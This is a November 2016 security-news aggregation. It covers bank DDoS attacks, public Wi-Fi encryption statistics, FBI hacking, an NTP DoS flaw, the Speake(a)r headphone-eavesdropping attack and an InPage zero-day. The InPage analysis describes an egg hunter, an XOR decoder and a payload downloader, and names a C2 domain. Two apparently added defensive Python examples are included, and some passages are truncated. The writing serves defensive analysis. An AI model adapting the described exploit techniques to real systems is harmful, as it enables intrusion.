The deadline for submissions is December 1, 2016.
You can send your abstract directly to The Program committee consists of six independent members, who evaluate the papers separately. They are Kaspersky Lab and external experts who share the SAS core value: uncompromising research. Have you been good this year? Santa The program committee will check soon.

Submit your abstract, find SPF20+ sunscreen, join the SAS family, follow @KasperskySAS and see how much fun it is — SAS2014, SAS2015 and SAS2016!

DDoS attack on the Russian banks: what the traffic data showed
25.11.2016 Kaspersky 
From November 8 to 12, the websites of some of the largest Russian banks fell victim to heavy DDoS attacks. Initially, there was no indication of anything unusual – all well-known banks get attacked from time to time – but further developments evolved in a manner that allowed us to suggest a high level of organization behind the series of attacks.

The first attacks that took place on November 8 affected two banks, but already at 4:00 pm Moscow time, similar attacks struck three more banks. A little later, a fourth bank was attacked.

On November 9 at 3 am, the attacks stopped for a while only to commence again in the evening with an attack on yet another bank. At approximately 5 am on November 10, a new wave of attacks occurred.

The largest number of attacks took place between 5 and 8 am on November 11 when, within the space of 10 minutes, eleven attacks occurred, which targeted various objects, namely, corporate websites of banks and online banking systems. All attacks lasted approximately one hour and were similar to the attacks registered in the previous days.

In the days to follow, no new attacks occurred, but some of the previously launched attacks continued until the morning of November 14.

Kaspersky Lab received first-hand information as events unfolded: some of the banks that were attacked are our customers, and they promptly switched their traffic to Kaspersky DDoS Prevention centers with a few more joining after events had started. This provided the analysts of Kaspersky Lab access to the patterns of the attacks and gave them an opportunity to draw a number of conclusions about their nature.

Attackers used combinations of various attack methods. They applied SYN Flood that exhausts operating system resources, as well as HTTP/HTTPS Flood that overloads the target Web server.
The longest attack in the series lasted 4 days 6 hours and 34 minutes;
The peak power of the attack was 660 thousand requests per second, while the average load on a corporate website of a major bank during business hours rarely exceeds 1 thousand requests per second;
A few botnets “specializing” in different types of attacks participated in the attack. Approximately 24 thousand unique bots have been blocked;
The traffic analysis showed that the leads pointing to Mirai, which prematurely appeared in the press, were not substantiated: one of the botnets was indeed built on the basis of IoT devices, but a different bot was used.
Bots that participated in the attacks are located in 30 different countries. More than half of them are in the United States, India, Taiwan and Israel.
The most powerful attacks started when it was early morning in Moscow, which seems illogical at first glance – the number of visitors to the target websites of banks is low at this time of day. This can be attributed to feeling out the target: the attackers started loading the websites with relatively simple SYN Flood and HTTP Flood attacks, thereby determining the possibilities of the protection systems to filter packets of trash traffic. The small number of legitimate visitors enabled them to quite accurately determine the frequency of requests necessary to create a denial of service situation.

Attacks against the banks protected by Kaspersky DDoS Prevention were not successful. Having recognized this, the attackers began to act in accordance with a more complex and demanding procedure – via HTTPS requests, and in some cases transferring the focus of the attacks onto Internet banking systems. Since the traffic of an HTTPS session is encrypted, it is impossible to analyze and filter it when located outside of the affected network. Thanks to the ability to analyze the traffic at the customer site (for this purpose, a separate “sensor” component is used), we received the statistical parameters of requests that were used to generate the filtering parameters directly in the cloud. In addition, the results of the analysis were forwarded to the IT services of the banks, which, if necessary, successfully generated counteraction measures on their side.
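The findings above boil down to a rate comparison: a corporate site that normally sees under 1,000 requests per second suddenly receives hundreds of thousands, from tens of thousands of distinct bots. The following added example (not Kaspersky DDoS Prevention code) runs that check over constructed access-log lines, scaled down from the article's figures; for HTTPS traffic such logic would have to run where TLS is terminated, as with the on-site sensor described above.

```python
"""Flag HTTP-flood seconds in web-server access logs by comparing the request
rate with a baseline learned from quiet traffic, and tell a distributed
(botnet) surge from a single noisy client.

Added example, not Kaspersky DDoS Prevention code. The log lines are
constructed here (RFC 5737 documentation addresses), scaled down from the
660,000 req/s peak and ~1,000 req/s baseline the article reports."""
import random
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Common Log Format: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
MSK = timezone(timedelta(hours=3))


def parse(line: str):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_floods(lines, baseline_secs=30, factor=10, min_sources=50):
    """Learn req/s from the first `baseline_secs` seconds, then flag every
    later second exceeding factor x baseline. Returns (baseline, flagged)."""
    by_second = defaultdict(list)          # epoch second -> source IPs
    for rec in filter(None, map(parse, lines)):
        by_second[int(rec["ts"].timestamp())].append(rec["ip"])
    seconds = sorted(by_second)
    learn = seconds[:baseline_secs]
    baseline = sum(len(by_second[s]) for s in learn) / max(len(learn), 1)
    flagged = []
    for s in seconds[baseline_secs:]:
        ips = by_second[s]
        if len(ips) <= factor * baseline:
            continue
        uniq = len(set(ips))
        flagged.append({
            "second": s,
            "rps": len(ips),
            "unique_sources": uniq,
            # Many distinct sources at once is the botnet signature; a burst
            # from a handful of IPs is more likely one misbehaving client.
            "pattern": "distributed" if uniq >= min_sources else "few-sources",
        })
    return baseline, flagged


def constructed_log(quiet_secs=40, flood_secs=15, seed=2016):
    """Build a synthetic log: a few office clients, then a surge from ~500 bots
    starting at 05:00 Moscow time, the quiet hour the attackers chose."""
    rng = random.Random(seed)
    t0 = datetime(2016, 11, 11, 5, 0, 0, tzinfo=MSK)
    clients = [f"198.51.100.{i}" for i in range(1, 6)]
    bots = ([f"203.0.113.{i}" for i in range(1, 255)]
            + [f"192.0.2.{i}" for i in range(1, 255)])
    lines = []
    for sec in range(quiet_secs + flood_secs):
        stamp = (t0 + timedelta(seconds=sec)).strftime(TS_FMT)
        n = rng.randint(4, 12)
        if sec >= quiet_secs:
            n += 300                        # the flood begins
        for _ in range(n):
            attacking = sec >= quiet_secs and rng.random() < 0.97
            ip = rng.choice(bots) if attacking else rng.choice(clients)
            lines.append(f'{ip} - - [{stamp}] "GET / HTTP/1.1" 200 512')
    return lines


if __name__ == "__main__":
    baseline, flagged = find_floods(constructed_log())
    print(f"baseline {baseline:.1f} req/s, {len(flagged)} flood seconds")
    for f in flagged[:3]:
        when = datetime.fromtimestamp(f["second"], MSK).strftime("%H:%M:%S MSK")
        print(when, f["rps"], "req/s from", f["unique_sources"], "sources:", f["pattern"])
```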

The carefully thought-out tactics, use of combined methodologies and scale of the event suggest a high level of organization among the attackers – the “job” was done by professionals. In regards to one of the banks, after all attacks were successfully dealt with, an elaborate attack method against the application level that took advantage of the web server vulnerability was used. This also points to the attackers being highly qualified.

It is difficult to say what the aims of the series of attacks were: it may have been blackmail, diverting attention from a hacking attack against banking systems, or political hacktivism. However, the fact that the attackers targeted the banks’ corporate websites first, and only then switched to remote maintenance systems if they were unsuccessful, allows us to conclude that the organizers were more interested in publicity rather than doing real damage to the financial institutions.

To a certain extent, our findings correlate with the reports that appeared in the press referring to the attacks being ordered from a certain DDoS service. According to its owner, the persons who ordered the attacks were unhappy with the influence that Russia allegedly had on the US Presidential election and the websites of major Russian banks were selected as high-profile targets whose operational difficulties would definitely be noticed.

Research on unsecured Wi-Fi networks across the world
25.11.2016 Kaspersky Safety
The very nature of wireless Wi-Fi networks means that hackers or criminals simply need to be located near an access point in order to eavesdrop and intercept network traffic. Poorly configured access point encryption or services that allow data to be sent without any encryption pose a serious threat to user data.

Confidential data can be protected by encrypting traffic at wireless access points. In fact, this method of protection is now considered essential for all Wi-Fi networks. But what actually happens in practice? Is traffic always encrypted on public Wi-Fi networks? How does the situation differ from country to country? Kaspersky Security Network statistics can answer all these questions. We compared the situation with Wi-Fi traffic encryption in different countries using data from our threat database. We counted the number of reliable and unreliable networks in each country that has more than 10 thousand access points known to us (this obviously excludes Antarctica and other regions where there is not enough data to draw any conclusions).

Security of Wireless Networks

Using statistics from Kaspersky Security Network (KSN), we analyzed data from across the world for almost 32 million Wi-Fi hotspots accessed by the wireless adapters of KSN users.


Encryption type used in public Wi-Fi hotspots across the world

Approximately 24.7% of Wi-Fi hotspots in the world do not use any encryption at all. This basically means that by using an antenna capable of sending and receiving data at 2.4 GHz, any individual located near an access point can easily intercept and store all user traffic and then browse it for data they are interested in. Fortunately, modern online banking systems and messengers do not transfer unencrypted data. But this is the only thing that prevents users of Wi-Fi networks with unencrypted traffic from revealing their passwords and other essential data when using an unsecure access point.

The WEP (Wired Equivalent Privacy) protocol for encryption of data transferred over Wi-Fi is used by approximately 3.1% of all analyzed access points. The protocol was the first to be created, quite a long time ago, and is now completely unreliable – it would take hackers just a few minutes to crack it. From a data security point of view, using WEP is not much different from using open networks. This protocol is being relegated to oblivion everywhere, but as we see from the chart above, it can still be found in use.

Around three-quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA) protocol family. The protocols from this family are currently the most secure. The effort required to hack WPA depends on its settings, including the complexity of the password set by the hotspot owner. It is worth noting that an attempt to decipher traffic from “personal” (WPA-Personal, PSK authentication) wireless networks (with public access points) can be made by intercepting the handshakes between the access point and the device at the beginning of the session. “Corporate” versions are protected from this sort of interception because they use internal company authorization. When it comes to “personal” WPA2 attacks, the situation is similar to that of WPA and mostly depends on the strength of the password set by the hotspot owner.

It is only fair to note that during a standard attack on a Wi-Fi access point, a personal computer can generate from 50 to 300 keys per second on average. If the encryption key is strong, it will take years to hack it. Still, no one can guarantee that the key used at a cafe will be secure and that the attacker will have nothing but a PC at their disposal.

Overall, it can be said that today’s WPA/WPA2 “non-enterprise” versions are reasonably, but not absolutely, secure. In particular, they allow brute-force and dictionary attacks. There are ready-to-use publicly available tools (aircrack-ng and similar software) for performing such attacks, as well as a large number of manuals.


Share of Wi-Fi hotspots that use unreliable WEP or do not encrypt data (by country)

We would like to note that the five countries with the highest proportion of unsecured connections include Korea (47.9% of unsecured Wi-Fi access points), while France (40.14%) and the US (39.31%) rate 9th and 12th respectively in the list.

Germany appears to be the most secure among Western European countries, with 84.91% of access points secured by WPA/WPA2 protocol encryption.


Share of Wi-Fi hotspots that use WPA/WPA2 (by country)

However, even when using an encrypted connection, you should not completely rely upon this security measure. There are several scenarios that could compromise even well-encrypted network traffic. These include fake access points with names that duplicate or mimic real ones (for example, TrainStation_Free or TrainStation Free) and compromised routers forwarding traffic without encryption to attackers (malware tools that infect such devices are already “in the wild”). At any rate, taking care of your own security is a good idea.
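The study's per-country metric (share of open or WEP access points, counted only where enough hotspots are known), the lookalike-SSID scenario just described, and the 50–300 keys-per-second figure from earlier in the article can all be worked through on scan data. The following is an added example, not Kaspersky Lab code; the scan records are constructed, not KSN data, and the country threshold is lowered from 10,000 so the sample is usable.

```python
"""Score Wi-Fi scan records the way the KSN study does (share of open/WEP
networks per country), spot lookalike SSIDs, and turn the article's
50-300 keys/s figure into years-to-exhaust numbers.

Added example, not Kaspersky Lab code; SCANS is constructed, not KSN data."""
from collections import defaultdict
import re

# (country, ssid, security flags as a scanner such as nmcli prints them)
SCANS = [
    ("DE", "Cafe_Berlin", "WPA2-PSK"), ("DE", "Bahnhof_WLAN", "WPA2-EAP"),
    ("DE", "FRITZ!Box 7490", "WPA2-PSK"), ("DE", "Hotel_Gast", "WPA-PSK"),
    ("DE", "AltesNetz", "WEP"),
    ("KR", "iptime", ""), ("KR", "KT_GiGA_2G", "WPA2-PSK"),
    ("KR", "U+Net", ""), ("KR", "SK_WiFiGIGA", "WPA2-PSK"),
    ("FR", "TrainStation_Free", "WPA2-PSK"), ("FR", "TrainStation Free", ""),
    ("FR", "Livebox-1234", "WPA2-PSK"), ("FR", "SFR WiFi FON", ""),
    ("FR", "FreeWifi_secure", "WPA2-EAP"), ("FR", "Boulangerie", "WEP"),
    ("US", "xfinitywifi", ""), ("US", "HomeNet", "WPA2-PSK"),
]

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def classify(security: str) -> str:
    """Map scanner security flags onto the study's categories."""
    s = security.upper()
    if s in ("", "--", "OPEN", "NONE"):
        return "open"
    if "WPA" in s or "RSN" in s:
        # Enterprise (802.1X/EAP) networks are not exposed to offline
        # handshake cracking the way PSK networks are.
        return "wpa_enterprise" if ("EAP" in s or "802.1X" in s) else "wpa_personal"
    if "WEP" in s:
        return "wep"
    return "unknown"


def unreliable_share(records, min_points=3):
    """Percentage of open-or-WEP access points per country, for countries
    with at least `min_points` records (the study used 10,000)."""
    total, weak = defaultdict(int), defaultdict(int)
    for country, _ssid, security in records:
        total[country] += 1
        if classify(security) in ("open", "wep"):
            weak[country] += 1
    return {c: round(100.0 * weak[c] / total[c], 2)
            for c in total if total[c] >= min_points}


def find_lookalikes(records):
    """Group SSIDs that collapse to the same name once case and separators
    are ignored (TrainStation_Free vs TrainStation Free)."""
    groups = defaultdict(set)
    for _country, ssid, security in records:
        key = re.sub(r"[^a-z0-9]", "", ssid.lower())
        groups[key].add((ssid, classify(security)))
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def brute_force_years(alphabet_size, length, keys_per_second=300):
    """Years to try every passphrase of this shape at the article's upper PC rate."""
    return alphabet_size ** length / keys_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    print(unreliable_share(SCANS))
    print(find_lookalikes(SCANS))
    print(f"8 lowercase letters: {brute_force_years(26, 8):.1f} years")
    print(f"8 mixed-case+digits: {brute_force_years(62, 8):,.0f} years")
```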

Recommendations for Users

There are several simple rules that help protect personal data when using open Wi-Fi networks in cafes, hotels, airports, and other public places.

Do not trust networks that are not password-protected.
Even if a network requests a password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection with the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by employees of the establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend disabling automatic connection to existing Wi-Fi networks too.
If you are not 100% sure the wireless network you are using is secure, but you still need to connect to the internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely not perform any online banking operations or enter your bank card details anywhere.
To avoid being a target for cybercriminals, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. It is recommended to enable this option when visiting any websites you think may lack the necessary protection.
If possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning criminals won’t be able to read your data, even if they gain access to them.
And, of course, you should use dedicated security solutions. They inform users about any potential dangers when connecting to a suspicious Wi-Fi network and prevent any passwords or other confidential data from being compromised if there is a threat.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users connected to Wi-Fi networks by providing a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (mail services, social networks, etc.).

Microsoft Shares Telemetry Data Collected from Windows 10 Users with 3rd-Party
24.11.2016 thehackernews Hacking
Cyber security is a major challenge in today's world, as cyber attacks have become more automated and difficult to detect, where traditional cyber security practices and systems are no longer sufficient to protect businesses, governments, and other organizations.
In the past few years, Artificial Intelligence and Machine Learning have made a name for themselves in the field of cyber security, helping IT and security professionals identify risks more efficiently and quickly and anticipate problems before they occur.
The good news is that if you are a Windows 10 user, Microsoft will now offer you a machine learning based threat intelligence feature via its inbuilt Windows security service, which will improve the security capabilities available on Windows 10 devices.
But, the bad news is that it is not free.
The company is offering this "differentiated intelligence" feature on its newly added service to Windows 10, dubbed Windows Defender Advanced Threat Protection (WDATP), which helps enterprises detect, investigate, and respond to advanced attacks on their networks.
This becomes possible after Microsoft recently signed a deal with FireEye that integrates the security vendor's iSIGHT Threat Intelligence into Windows Defender Advanced Threat Protection.
As part of the partnership, Microsoft will give FireEye access to all the telemetry data from every device running Windows 10, Australian website ARN reports.
"FireEye has invested in nation-state grade threat intelligence, and we are strategically partnering with industry leaders to operationalize this high-quality intel," Ken Gonzalez, FireEye's Vice President of Corporate Development, said in the official press release.
"By working with Microsoft, we’re able to offer differentiated threat intelligence within WDATP and together help make organizations more secure."
It's no secret that Windows 10 collects all sorts of usage information on users and sends them back to Microsoft, which then uses this telemetry data to help identify security issues, fix problems and improve the quality of its operating system.
This telemetry data includes information on the device running Windows 10, a list of installed apps, crash dumps, and other statistics from devices powered by its latest operating system.
However, Microsoft's data-mining capability has also raised privacy concerns among Windows users.
This newly-signed deal with FireEye is the first time that Microsoft has publicly agreed to share telemetry data of Windows 10 users with a third-party, which is definitely worrying for many users.
At this moment, the official press release says nothing about Microsoft providing FireEye with access to data collected from Windows 10 users.
Microsoft has yet to comment on this matter.

FBI Hacked into 8,000 Computers in 120 Countries Using A Single Warrant
24.11.2016 thehackernews BigBrothers
The FBI hacked into more than 8,000 computers in 120 different countries with just a single warrant during an investigation into a dark web child pornography website, according to newly published court filings.
This FBI's mass hacking campaign is related to the high-profile child pornography Playpen case and represents the largest law enforcement hacking campaign known to date.
The warrant was initially issued in February 2015 when the FBI seized the Playpen site and set up a sting operation on the dark web site, in which the agency deployed malware to obtain the IP addresses of the site's alleged visitors.
The piece of malware used by the FBI is known as a Network Investigative Technique (NIT). The malware was used for at least 13 days to break into the computer of users who visited certain threads on Playpen and then sent their IP addresses back to the bureau.
Earlier this year, court documents related to the Playpen case revealed that the FBI hacked over 1,000 alleged visitors of Playpen in the U.S. using a single warrant, along with computers in Australia, Chile, Colombia, Austria, Denmark, Greece, the UK, Turkey, and Norway during the investigation.
However, the new federal court hearing transcript from a related case reveals that the hack went much farther and wider than previously believed, and that the bureau actually hacked into more than 8,000 users' computers across 120 different countries.
"We have never, in our nation's history as far as I can tell, seen a warrant so utterly sweeping," federal public defender Colin Fieman said in a court hearing at the end of October, according to the transcript.
According to the transcript, the FBI also hacked what has been described as a "satellite provider." "So now we are into outer space as well," Fieman said.
"The fact that a single magistrate judge could authorise the FBI to hack 8,000 people in 120 countries is truly terrifying," Christopher Soghoian, a principal technologist at the American Civil Liberties Union (ACLU), told Motherboard.
The major controversy surrounding the Playpen case has been that Virginia-based US Magistrate Judge Theresa C. Buchanan who signed the warrant did not have the authority to authorize such searches.
The fact is that the magistrate judges are a more junior type of judges who don't actually have jurisdiction to issue warrants outside their own districts. Only more senior federal judges, known as district judges, have the authority to issue such warrants under Rule 41.
However, this would likely change with the changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the US Department of Justice.
Changes to Rule 41 will Further Expand FBI's Mass Hacking Capabilities
The changes to Rule 41 will grant the FBI much greater powers to hack into any computer within the country, and perhaps anywhere in the world, with just a single search warrant authorized by any US judge (even magistrate judges).
The changes in this rule are set to take effect on December 1, 2016.
"The US government wants to use an obscure procedure—amending a federal rule known as Rule 41— to radically expand their authority to hack," the Electronic Frontier Foundation (EFF) said. "The changes to Rule 41 would make it easier for them to break into our computers, take data, and engage in remote surveillance."
However, the DoJ further defended the changes to Rule 41 in a Monday blog post.
"We believe technology shouldn't create a lawless zone merely because a procedural rule has not kept up with the times," writes Assistant Attorney General Leslie R. Caldwell of the Criminal Division.
If the changes take effect, privacy activists and cybersecurity experts believe US law enforcement will most likely use the amended Rule 41 to further expand its mass hacking operations.

Antivirus Firm Kaspersky launches Its Own Secure Operating System
24.11.2016 thehackernews Safety
The popular cyber security and antivirus company Kaspersky has unveiled its new operating system, Kaspersky OS, which it describes as hack-proof.
The new operating system has been in development for the last 14 years and was designed from scratch rather than being based on Linux.
Kaspersky OS makes its debut on a Kraftway Layer 3 Switch, CEO Eugene Kaspersky says in his blog post, without revealing many details about its new operating system.
The Layer 3 switch is the very first device running Kaspersky OS; it is designed for networks with extreme data-security requirements and is aimed at critical infrastructure and Internet of Things (IoT) devices.
What makes Kaspersky OS different from other operating systems?
Kaspersky OS is based on a microkernel architecture: the new secure OS is built on a microkernel, which lets users assemble an operating system tailored to their needs.
So, depending on a user's specific requirements, Kaspersky OS can be composed from different modular building blocks of the operating system.
Kaspersky OS is non-Linux: Yes, one of the three major distinctive features of the new OS mentioned by Kaspersky is that the GUI-less operating system has been constructed from scratch and does not contain "even the slightest smell of Linux."
"All the popular operating systems are not designed with security in mind, so it is simpler and safer to start from the ground up and do everything correctly. Which is just what we did," says Kaspersky.
But what makes Kaspersky OS Hack-Proof?
It is the operating system's built-in security system, which is able to control the behaviour of applications and of the OS modules.
Kaspersky claims the OS is practically unhackable, because to gain unauthorized access an attacker would need to break the digital signature of an account holder, which the company says is feasible only with a quantum computer.
"In order to hack this platform a cyber-baddie would need to break the digital signature, which – anytime before the introduction of quantum computers – would be exorbitantly expensive," says Kaspersky.
Kaspersky also talked about the recent DDoS attacks that affected numerous websites over the past few months. He asserted that Kaspersky OS would protect devices such as industrial control systems (ICS/SCADA) and IoT devices from cyber attacks.
The most severe was the recent massive DDoS attack on Dyn's DNS servers, which knocked down popular sites like Amazon and Twitter. The attack was carried out by the Mirai botnet, built from infected smart devices such as security cameras.
So, Kaspersky says it is mandatory to protect the IoT and other critical infrastructure (like industry, transport, and telecoms) from IT threats.
"I also hope it's clear that it's better – no matter how difficult – to build IoT/infrastructure devices from the very beginning in such a way that hacking them is practically impossible. Indeed, that is a fundamental goal with Kaspersky OS," he says.
More details about Kaspersky's secure operating system are expected soon. Stay tuned!

Personal data of 134,000 United States Navy sailors leaked
24.11.2016 securityaffairs Incident

Personal data belonging to 134,386 current and former United States Navy sailors have been leaked. NCIS and HPE are investigating the case.
The United States Navy has confirmed that the personal data of 134,386 current and former employees were leaked.

The names and Social Security numbers of the affected personnel were stored on a laptop, used by a Hewlett Packard Enterprise Services employee, that was compromised.

The Naval Criminal Investigative Service (NCIS) and HPE, who are investigating the incident, discovered that “unknown individuals” accessed the personal data of United States Navy personnel.

“Oct. 27, 2016, the Navy was notified by Hewlett Packard Enterprise Services (HPES) that one of the company’s laptops operated by their employee supporting a Navy contract was reported as compromised.” reads the Security Breach Notification of Sailors’ PII.

“After analysis by HPES and a continuing Naval Criminal Investigative Service (NCIS) investigation, it was determined Nov. 22, 2016, that sensitive information, including the names and Social Security Numbers (SSNs) of 134,386 current and former Sailors were accessed by unknown individuals.”


The US Navy did not disclose details of the incident, and there is no evidence that the exposed data have been abused by the unknown attackers.

It is still unclear whether the laptop was lost or stolen, or whether malware exfiltrated data from its hard disk.

“We are in the early stages of investigating and are working quickly to identify and take care of those affected by this breach,” naval personnel chief Vice Admiral Robert Burke said.

“The Navy takes this incident extremely seriously – this is a matter of trust for our sailors.”

The United States Navy will notify employees affected by the security breach in “coming weeks.”

The Navy is reviewing credit monitoring service options for affected people.

CVE-2016-9311 NTP DoS Exploit Released, update your Windows server asap
24.11.2016 securityaffairs

A researcher has released a PoC exploit for the CVE-2016-9311 flaw, which can crash the NTP daemon and trigger a DoS condition on Windows systems.
NTP itself has repeatedly been used as an attack vector. NTP is a networking protocol widely used for clock synchronization between systems over packet-switched, variable-latency data networks.

In the past, experts reported a weakness in the NTP protocol that could be exploited by attackers to power massive DDoS attacks. In February 2014 the largest DDoS attack seen until then, a 400 Gbps NTP amplification attack, hit the European servers of the anti-DDoS protection firm CloudFlare.

This week the Network Time Foundation fixed a flaw, tracked as CVE-2016-9311, that affects ntpd versions prior to 4.2.8p9 (ntp-4.3.94 excepted).
The flaw, discovered by the security researcher Magnus Stubman, can be exploited to crash the NTP daemon and trigger a denial-of-service (DoS) condition on Windows systems.

The vulnerability was addressed with the release of NTP 4.2.8p9, a security update that bundles a total of 40 security patches, bug fixes, and improvements.

A patch was developed and sent to Stubman on 29 September. The researcher confirmed the fix a couple of days later and has now publicly disclosed the flaw.

“The vulnerability allows unauthenticated users to crash ntpd with a single malformed UDP packet, which causes a null pointer dereference,” Stubman wrote in an advisory published Monday.

“CWE-476: NULL Pointer Dereference – CVE-2016-9311. ntpd does not enable trap service by default. If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. Affects Windows only.” reads Vulnerability Note VU#633847 issued by the CERT Coordination Center at the Software Engineering Institute at Carnegie Mellon University.

Stubman released a PoC exploit that crashes the NTP daemon and triggers a denial-of-service (DoS) condition on Windows systems. In practice this means anyone could knock over an exposed server with a single specially crafted UDP packet.

“NTP users are strongly urged to take immediate action to ensure that their NTP daemons are not susceptible to being used in distributed denial-of-service (DDoS) attacks. Please also take this opportunity to defeat denial-of-service attacks by implementing Ingress and Egress filtering through BCP38. ntp-4.2.8p9 was released on 21 November 2016 and addresses 1 high- (Windows only), 2 medium-, 2 medium-/low-, and 5 low-severity security issues, 28 bugfixes, and contains other improvements over 4.2.8p8.

Please see the NTP Security Notice for vulnerability and mitigation details.” reads the security notice.

Looking closely at the NTP security notice, the trap-crash vulnerability reported by Matthew Van Gundy of Cisco is the same issue the CERT note above lists under CVE-2016-9311; note that it is only reachable when trap service has been explicitly enabled, which is not the default.

“If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service,” reads the advisory.

The CERT Coordination Center at the Software Engineering Institute at Carnegie Mellon University has also listed vendors whose products could be affected by the bugs.

Administrators are urged to patch their NTP implementations as soon as possible, given the availability of the PoC exploit code.

Speake(a)r attack allows to spy on users through typical headphones
24.11.2016 securityaffairs Attack

Speake(a)r attack – Security researchers have demonstrated how to turn headphones into a microphone and spy on the conversations of a target
A group of security researchers at Ben Gurion University have demonstrated that it is possible to turn headphones into a microphone and eavesdrop on a target's conversations in the background without raising suspicion.

The team is famous for having devised several methods to exfiltrate data from air-gapped networks.

The researchers developed a proof-of-concept malware, dubbed Speake(a)r, that uses ordinary headphones as microphones and records all surrounding conversations, turning them into a bugging device.

The researchers published technical details of the Speake(a)r attack in the research paper titled “Speake(a)r: Turn Speakers to Microphones for Fun and Profit.”

Using headphones as microphones is not a novelty; many other groups have devised such techniques.

What makes this research interesting is that it manages to switch an output channel of the audio card on a laptop, running either Windows or Mac OS, into an input and then record sound without any dedicated microphone channel, from as far as 20 feet away.

The Speake(a)r malware lets a compromised computer record audio even when the microphone is disabled or physically disconnected.

“People don’t think about this privacy vulnerability,” explained the lead researcher Mordechai Guri. “Even if you remove your computer’s microphone, if you use headphones you can be recorded.”


Speake(a)r uses the headphones themselves to capture vibrations in the air: the headphone diaphragms convert them into weak electrical signals, and the malware alters the configuration of the audio jacks so that an output jack (normally used for speakers and headphones) is retasked as an input jack (normally used for microphones).

With this technique, an attacker is able to record audio, though at lower quality, from computers whose microphone is disabled. The method also works if the user has removed the microphone from the computer entirely.

The method devised by the experts leverages a feature of Realtek audio codec chips that allows the computer's output channel to be silently “retasked” as an input channel.

Realtek codecs are used in the majority of computers today, so the Speake(a)r malware works on practically any machine. According to the researchers, the issue is not easy to fix: the codec chip itself would have to be redesigned and replaced.

“This is the real vulnerability,” added Guri. “It’s what makes almost every computer today vulnerable to this type of attack.”


InPage zero-day exploit used to attack financial institutions in Asia
24.11.2016 Kaspersky Vulnerability
In September 2016, while researching a new wave of attacks, we found an interesting target which appeared to constantly receive spearphishes, a practice we commonly describe as a “magnet of threats”. Among all the attacks received by this magnet of threats, which included various older Office exploits such as CVE-2012-0158, one of them attracted our attention. This file, which was also uploaded to a multiscanner service in September 2016, had an extension that we were unfamiliar with – “.inp”. Further investigation revealed this was an InPage document. InPage, in case you are wondering, is publishing and text processing software, mostly popular with Urdu and Arabic speaking users.


InPage user groups from vendor official site

Since no exploits for InPage have previously been mentioned in public, we took a closer look to see whether the document was malicious. Further analysis indicated the file contained shellcode, which decrypts itself and then decrypts an EXE file embedded in the document. The shellcode triggers on several versions of InPage. We have found no public mention of such an exploit, so we consider it a zero-day. All our attempts to contact InPage have so far failed.

Discovery and analysis

InPage is an interesting choice of vulnerable software, as it is widely used within the Indian Muslim population as well as in Pakistan. This, of course, includes local mass media and print shops, as well as governmental and financial institutions (banks). For someone wanting to deploy attack modules into regional press-related companies, an InPage exploit would work well.

Given the wide range of technologies in our products, it was perhaps not surprising to see that Kaspersky Lab products already detect the exploit with the generic rule HEUR:Exploit.Win32.Generic. This detection is triggered by the presence of shellcode inside a Microsoft Compound File (OLE) and has worked extremely well against a wide category of Office-based exploits going back to 2009.

The good news is that Kaspersky Lab users have been protected against this attack for quite some time – and the protection worked well in the past when it blocked a number of malicious InPage documents.

Between the various phishing campaigns relying on this exploit, one particular attack attracted our attention. The targets of this attack were special, since they were banks in Asia and Africa. The payload and C&C servers are also different from the recent attacks we’ve observed, meaning there are probably several actors utilizing this zero-day exploit at the moment.

Technical details


Spearphishing e-mail with several malicious attachments. The .inp contains the zero-day exploit

In their attacks, the threat actors often use more than one malicious document. During spearphishing, the actors attached InPage files as well as .rtf and .doc files carrying old, popular exploits.

Looking through all the related documents we could find, we counted several different versions of keyloggers and backdoors written mostly in Visual C++, Delphi and Visual Basic.

One such keylogger we analysed (MD5 hash: 18a5194a4254cefe8644d191cb96da21) was written in Visual C++. After gaining control, the module decodes several internal strings. One of them is the C2 domain name visitorzilla[.]com. This backdoor maintains persistence by creating “C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\DataABackup.lnk“. Similar to the other campaign modules, it uses SetWindowsHook() with WH_KEYBOARD_LL hook to gather keystrokes. To gather keystroke data, the module uses two files on disk: C:\Documents and Settings\<USER>\Application Data\DataBackup\sed.ic and me.ic (located in the same directory).

Inside weaponized documents

InPage uses its own proprietary file format that is based on the Microsoft Compound File Format. The parser in the software’s main module “inpage.exe” contains a vulnerability when parsing certain fields. By carefully setting such a field in the document, an attacker can control the instruction flow and achieve code execution.

The shellcode has three main parts:

Pattern searcher (so-called “egg hunter”) before the decoder,
The pattern searcher looks through the whole virtual address space for the byte pattern 68 72 68 72. Once it finds this pattern, the next stage of the exploit, the decoder, starts.


Shellcode decryptor

The small decoder obtains its own instruction pointer with the FLDPI + FSTENV instruction pair (an old and uncommon GetPC technique) and then decrypts the next stage with an arithmetic NOT followed by XOR 0xAC.

Next, the downloader fetches a remote payload with InternetReadFile() and runs it from the %userprofile% directory using WinExec(). This functionality is very common and we have seen it with many other exploits. What is interesting in this case is the choice of vulnerable software: an exploit for an application that is popular mostly in India and Pakistan.
